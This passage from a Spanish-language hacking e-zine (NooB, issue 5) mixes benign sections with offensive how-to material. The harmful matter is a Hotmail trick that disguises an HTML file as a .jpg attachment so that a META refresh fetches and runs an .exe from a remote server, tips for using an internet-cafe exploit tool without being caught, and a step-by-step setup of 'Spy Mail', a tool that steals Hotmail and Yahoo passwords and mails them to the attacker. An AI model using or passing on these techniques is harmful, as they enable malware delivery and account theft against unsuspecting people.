generalmente ocurre eso. Lo que si pueden hacer es buscar en google, ponen 
”HackCiber 4.0” download, y busquen. (de paso aprenden a buscar xDDD).

 

Consejos: No debeis usar este exploit en cybers pequenos, por que corren 
el peligro de ser descubiertos, es mejor prevenir y utilizarlos en lugares 
grandes, con muchos ordenadores.


Fallos en Hotmail

Esto es una muestra de que Hotmail tambien es un agujero negro. Crear
un archivo de texto en el bloc de notas con el código javascript por
ejemplo de una alerta:

<script language="JavaScript"> 
  alert(' archivo corrupto'); 
</script>
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://servidor/tu.exe">

Edita la linea por un archivo que quieres que se ejecute.
http://servidor/tu.exe

Una vez creado hay que guardar pero con la extención .jpg, ejemplo
"mifoto.jpg".
Adjuntarlo en un mail, y enviar, probar luego ver el adjunto, y veran
que se ejecuta el código del script.

El fallo se ha reproducido con exito en varios sistemas y por ahora se
siguen las pruebas para determinar los entornos vulnerables y el
debate está abierto.

Esto da mucho que pensar, si ves la linea
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://servidor/tu.exe">

Puedes alojar un virus en un servidor, y ejecutarlo desde el archivo
adjunto mifoto.jpg

Aqui, Nada es seguro!


Feliz Hacking, les desea Gamb88

Cualquier duda dirijir a gcard88@gmail.com


///////////////////////////////////////////////////////////////////////////////

8.- En mi viejo disco duro:  E-Zine El Gran Cafe  

Escrito por: Alicuencana

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Se que el titulo no incita en absoluto a la lectura de este articulo, soy 
consciente pero lo considero una parte que puede resultar muy interesante.
Vamos a analizar y recordar viejas e-zines que aparecieron un dia y 
desaparecieron dejando una estela tras ellas.
Para no saturar de nostalgia tratare una solo por numero (y solo si veo que 
merece la pena la misma), lo considero muy interesante porque de las viejas 
zines salieron muy buenos txt que aun hoy son muy aprobechables, ademas 
el boom del hacking fue en 1998 y en ese periodo hasta el 2000 surgieron muchisimas
aunque no por ello (salvo excepciones) peores.

La zine que vamos a analizar hoy es El Gran Cafe, esta ezine saco 9 numeros con 
un especial de diciembre.
Se hacian denominar cyberpunks, termino que gracias al manifiesto que sacaron 
a la luz con su numero tres se puso de moda aunque mucha gente no tenia ni idea
de que era, el manifiesto estaba en todas partes, no se si realmente fueron 
ellos los que lo escribieron o sencilamente lo tradujeron o copy de alguna
parte pero todo apunta a que en lengua hispana fue la primera vez que vio
la luz.
En el mismo numero (el 3 ) habia otro texto sobre cybercultura y mas manifiestos
ademas de cartas abiertas que como ya dijo se convirtieron en la bandera de 
mas de una persona, como  ya anunciaron al principio venian con ganas y 
ciertamente se fueron dejando ahi unos textos que aun hoy (5 anyos despues de 
los primeros numeros) gusta de leer.

Sus textos sobre esteganografia fueron claros y explicitos lo cual acerco esa nueva
tecnologia del momento mas a quienes aspiraban a su conocimiento.
De regalo por su segundo cumpleanyos salia el manifiesto cyberpunk 2000, nueva
pieza clave de lo que cada intentaba ser una cultura por si misma, pero no solo
en esos numeros estaba su grito si revisas todas las revistas comenzo en el 
numero tres pero hasta el ultimo numero trataron en mayor o menor medida 
su "cyberpolitica".

Sus numeros tubieron buenos articulos (aunque a veces hablaban de lo mismo que 
todas las demas revidtas) pero la originalidad en ese punto era clara.

Os recomiento uns lectura a la zine en todos sus numeros, puede que entre
manifiesto y manifiesto estes de acuerdo con lo que dicen ahi :)
 
En el proximo numero:
Antilammer Zone

///////////////////////////////////////////////////////////////////////////////

9.- Analizando programas.  

Escrito por: Alicuencana

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Esta es la antigua seccion de Programillas utiles a nuestra causa, van a seguir
siendo programas utiles para nosotros pero en vez de enumerarlos y poner algun
link donde poder descargarlos vamos a profundizar un poco en el mismo para ver 
su uso y sus funciones.
Este mes vamos a analizar el programa Spy Mail, es un programa muy util para 
aquellas personas que queren averiguar la pass de alguien en concreto o de 
algunos en general, el dice valer tanto para Hotmail como para yahoo.

Tras descargarnos el programa e instalarlo vemos que nos parece unicamente un 
archivo web sobre como se usa el programita (la verdad es que lo explica muy
claramente).
Nos dice que vayamos a ejecutar y ejecutemos el programa smconfig.exe abriendose
una ventana de password rapidamente, el password por defecto al instalarlo es:
spymail tal com lo veis ahi, una vez introducido el mismo viene lo bueno:

La primera casilla a rellenar es el mail donde tu quieres recibir los correos 
que recoja, importantisima esa casila asi que asegurate de que este bien 
puesta tu direccion de correo.

La segunda casilla es el mail desde el que quieres que venga desde alguna parte
tendra que mandarte el mail, no?

La tercera casilla es el subject que quieres que aparezca por ejemplo:
Cartita de mi amigo SMAIL, tampoco seamos tan listos de poner un subject como
este: "Passwords recojidos por el spymail de los pardillos de turno".

La siguente casilla es el smtp, la direccion que pones en el outlook (como ej.
para quien lo use) de tu servidor de correo de la segunda cuenta puesta, 
el mismo programa te da un ejemplo: smtp.mail.com yo te aconsejo una cuenta 
gmail para este fin que son las mas utilitarias a nivel smtp ahora mismo 
no te dan mucho problemas y funcionan muy bien (si no solo tienes que ver la
abalancha de programas que han surgido con esto y mas utilidades).

Y la ultima casilla es para que pongas el login y password si tu servidor isp 
los pide para enviar un correo, mi consejo que por si las moscas te hagas una 
cuenta solo para este fin (por ejemplo gmail si te lo pide).

Una vez hayas acabado de rellenar todos estos datos dale a Save New Settings
para que se guarden los cambios (hay... ese ingles...).

Las demas opciones son para Set New Password, cambiar el password de inicio de 
sesion para que no te cambien datos...; Exit, pues para eso mismo....; 
Add to Windows StartUp para que al iniciar Windows se inicie el tambien; 
Sed Test Mail esta tambien es muy util para probar que funcione correctamente 
y hayas introducido todos los datos bien.

En tanto que la opcion Enter Serial Number es para actualizaciones y demas yo 
te afirmo que hay sitios donde te o puedes descargar ya crackeado para saber que
lo esta al poner un serial cualquiera (prueba 12345, el de siempre xd) tiene
que salir un mensaje tal que este:
The new serial number is registered an saved.
You need to restart windows to activate the registered version of spymail, bla 
bla..
Aunque tambien hay un modo Demo pero no le he encontrado por lo que desconozco
cuales son las limitaciones del mismo.

Ale a por mails... aunque desconozco para que se pueden querer que los celos son
muy malos... xd


///////////////////////////////////////////////////////////////////////////////

10.- Sobre los emuladores de PC  

Escrito por: Yani

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

En nuestro numero 3 de la Zine hablamos y explicamos el uso del programa VMWare
gracias al cual podiamos crear maquinas virtuales, pero como ya os comente hay 
muchos otros programas que cumplen la misma funcion y, recientemente, una 
persona me mando un programa de lo msimo diciendome que era mucho mejor, y esta
en lo cierto.
El VirtualPc sirve para lo mismo, emular ordenadores y os preguntareis ¿porque 
es mejor? paso a paso porque tras muchas pruebas le gano al otro en muchas cosas

- Emulacion de hardware: el VMWare deteccta automaticamente el hardware, cierto 
mientras que elvirtual pc has de ser tu quien le de las imagenes adecuadas (ya
os ensenyaremos ha hacer imagenes, tranquilidad) para que lea esa unidad, es 
viendolo un poco royo pero siempre podras elegir tu las unidades o hard que 
quieres que funcione pero lo positivo es:

   1.- Si el WMware no detecta una unidad ya te has quedado sin ella.
   2.- Imagina que no tienes disketera o unidad de cd en tu pc pues con la imagen
adecuada que te hayas creado o descargado de por ahi puede emular esa unidad
pareciendo asi que realmente si la tienes en tu pc.

Esto va teniendo mejor aspecto no?

- Otro punto importante en las diferenciias de estos programas es el trabajo en 
red, tener una maquina virtual y asi parecer que tienes dos conectadas a inter
net o una LAN puede ser muy util y ciertamente el Virtual PC se lleva la palma
alla donde lo prove me detecto automaticamente las redes sin ningun tipo de pro
blemas en tanto que el VMWare si no detecta tu modem o adaptador de red ya no 
tienes posibilidad alguna.

-Otro pequeño punto a tratar es el borraado de la maquina virtual, cuando la creas
asignas un espacio de memoria para la misma, el Virtual pc solo tiene 4 botones
pero uno de ellos es borrar, mientras que el el Ware tienes que hacer virgerias
para consegir eliminar la unidad y que te devuelva esos gigas o megas que le
has asiganado.

Bueno este articulo queda como fe de error que si nos equivocamos lo decimos
(si nos damos cuenta claro xd). Es una comparativa nada mas luego cada uno/a
que elija lo que mas le convenga.

Si conoces alguno que pienses que es aun mejor ya sabes estas tardando para 
decirnoslo.




///////////////////////////////////////////////////////////////////////////////

11.- Otras tontunas  

Escrito por: Yani

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

¿Sabias que...?

-> En una recientes conseferencias uno dde los integrantes de CSIC espanyol 
dio una charla sobre Hacking en Google, aqui os dejamos la direccion para que
la podais leer y releer tranquilamente ;) 
http://www.criptored.upm.es/guiateoria/gt_m063a.htm 


-> Recientemente tuvo lugar en Madrid Muundo Internet 2005 feria en la cual 
se expusieron algunas novedades. Sin lugar a dudas lo mas interesante del mismo
fueron sus conferencias si alguien quiere saber lo que se perdio aqui les
dejo la web:
http://www.aui.es/mundointernet/

///////////////////////////////////////////////////////////////////////////////

12.- Despedida  

Escrito por: Alicuencana

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Hasta aqui el numero 5 de NooB en los 9 meses de vida que tiene ya casi el 
numero de gente que colabora y esta aqui activamente vamos creicendo ;) a todos
ellos gracias por su dedicacion y a vosotros por estar aqui.
Esperemos que para el proximo numero salgan esos articulos que hemos tenido 
que dejar en el tintero por el tiempo.. y para el siguiente numero yo misma 
retomare para que puedan ser ampliados y continuados.

Hasta el proximo numero.

////////////////////////////////////////////////////////////////////////////////

13.- Claves PGP.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

              Clave del mail de la zine:
                  noob_zine@yahoo.es


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

mQGiBEFAU1oRBADEaRS9num6HvGsCqALPRSlCYbDMk8+ZNiOVpEFkUMOYT2YglDf
pF8qn1MNyScG9u2xay/y4gNxKfhwoI2CR+q0+GrN7Hw4BzhI1HKAv/d0ZfvfNWq0
oyzxU9qOrQQFaUii7Fr14kFRmC1JLtn6PFh3eCzZrOHhV8pEJB/m2+rVfwCg/+MV
6MTt6XuvmuwNtILDuu9qGUsD/RxgHIYfqMJjwfyc+uV6HRWBiUia/l7/bQ1ba1mw
EUDAuJmgwlAEZK5SRQByavjVfK74WH/TsARWVQbTBthN5v6alL/8RK04Jj+78Nqg
0yM9bnTp8hNMLSD6QyXPdZj7x94BkWbUmrDV3TnFpykYz9zO1l4dP5iss+axlhe4
H8y4A/9l86jqhtiQvPzYWUcQa0fSBeAgQdHsyTE0vRevESfINRKCodNRmZMQx7cq
2DNGeYC6GZw/PiV24KTEEG8xvCn0v92y6F3k3ZwBbc3oy9a1DEa87bhePeEbAYda
2FZJsJiQedAfPHpjx3YYQQzO9Mp4tHzKhEQnIAofI41G857e1bQZWWFuaSA8bm9v
Yl96aW5lQHlhaG9vLmVzPokAXQQQEQIAHQUCQUBTWgcLCQgHAwIKAhkBBRsDAAAA
BR4BAAAAAAoJEKdxlgnhvvOay0UAmgI5LU9KAVdLgAjuV/pCYBST1mP1AJ9wS3eR
BGhoc4+Ei0SbM7mOWWXKS7kCDQRBQFNaEAgA9kJXtwh/CBdyorrWqULzBej5UxE5
T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/c
dlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaCl
cjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD
8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZ
yAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+
IPDAcJ6qg8iIrc8O5noi6J7l5mB7ClGZ00YhGpj1KCXOvIu5kc4Qp/J/c1sa6w8u
BkZpBT4p4Y0TvLoSo0JmtH7M/NygxkQElNpZJWAngMg1DnQoUPd4t1Xyfd7+7VSO
az17EB53FMc5pQUAXOp2RTV1lTI8JfbqHJJhgR/KTRvzxo42l0rsee9Br8f7iwvY
67MJyx1rl4CRkn5ODC1LAuzTqX+9QPHpr4H3u0MON5fyjHWvYnS6ye8PNXvOQWRU
mwixp9m5B50pNBD57skRq5CdEWdIYRBbiJ73BzCq+DKOZHqltUK7g5GNxJSqPAtm
x7J5Nbu4DZPqm0/HB+SRLYkATAQYEQIADAUCQUBTWgUbDAAAAAAKCRCncZYJ4b7z
mt4HAKCDgZmfS3FEkLKbVvEMVDVLEogw6QCgyTGC91E5gd/spXd8+LGE7X/jvfg=
=kxOy
-----END PGP PUBLIC KEY BLOCK-----






                            """"""""""""""""""""""""""""""""""""""
                            "   NooB Zine no se responsabiliza   "
                            "  del contenido de estos articulos, " 
                            "    ni del mal uso que se pueda     "
                            "          hacer de ellos.           "
                            """"""""""""""""""""""""""""""""""""""

